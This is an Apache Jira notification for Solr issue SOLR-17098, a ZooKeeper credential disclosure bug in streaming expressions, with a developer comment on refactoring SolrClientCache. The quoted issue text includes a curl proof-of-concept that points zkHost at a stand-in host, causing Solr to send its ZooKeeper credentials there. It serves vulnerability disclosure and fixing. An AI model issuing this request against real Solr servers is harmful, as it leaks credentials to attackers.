[jira] [Commented] (SOLR-17098) Zookeeper Credential Information Disclosure bug via Streaming Expressions

[David Smiley (Jira)]

    [ 
https://issues.apache.org/jira/browse/SOLR-17098?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18081006#comment-18081006
 ] 

David Smiley commented on SOLR-17098:
-------------------------------------

I'm not a fan of this SolrClientCache.setDefaultZKHost(..) method.  For one I 
don't love _any_ ZK reference in this module (mostly going away in SOLR-18130). 
 For two, I don't like that it modifies the configuration post-construction.  
For three... the details of how it works are quirky; it'd *really* clean things 
up in its absence within SolrClientCache.  At the moment I'm looking at 
SolrClientCache as a code reviewer of SOLR-18130 
[PR|https://github.com/apache/solr/pull/4320].  I could imagine a method like 
{{put(CloudSolrClient.CloudSolrClientConnection, CloudSolrClient client)}} and 
we call this in ZkController which has a CloudSolrClient with our 
zkStateReader.  IMO this is much more elegant (and wasn't an option in 2024).  
It'll lead to connection re-use too.  WDYT?

> Zookeeper Credential Information Disclosure bug via Streaming Expressions
> -------------------------------------------------------------------------
>
>                 Key: SOLR-17098
>                 URL: https://issues.apache.org/jira/browse/SOLR-17098
>             Project: Solr
>          Issue Type: Bug
>          Components: streaming expressions
>            Reporter: Houston Putman
>            Assignee: Houston Putman
>            Priority: Blocker
>             Fix For: 8.11.3, 9.4.1
>
>         Attachments: SOLR-17098-1.diff, SOLR-17098.diff
>
>
> Security list thread: 
> [https://lists.apache.org/thread/byrxkqk15mh6960wmx4r851srosgkvbh]
>  
> ZK Credentials and ACLs can be exposed to any endpoint when the Streaming 
> Handler is used:
>  
> {{curl --data-urlencode 'expr=search(collection1,}}
> {{       zkHost="target:2121",}}
> {{       qt="/export",}}
> {{       q="*:*",}}
> {{       fl="id,a_s,a_i,a_f",}}
> {{       sort="a_f asc, a_i asc")' [http://localhost:8983/solr/demo/stream]}}
>  
> In the command above, if the Solr instance has any Zookeeper Credentials or 
> ACLs provided, then that information will be sent to the "target:2121" 
> address. An attacker could set up a mock Zookeeper service to obtain the 
> credentials, and then gain access to the Solr's Zookeeper Nodes.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscr...@solr.apache.org
For additional commands, e-mail: issues-h...@solr.apache.org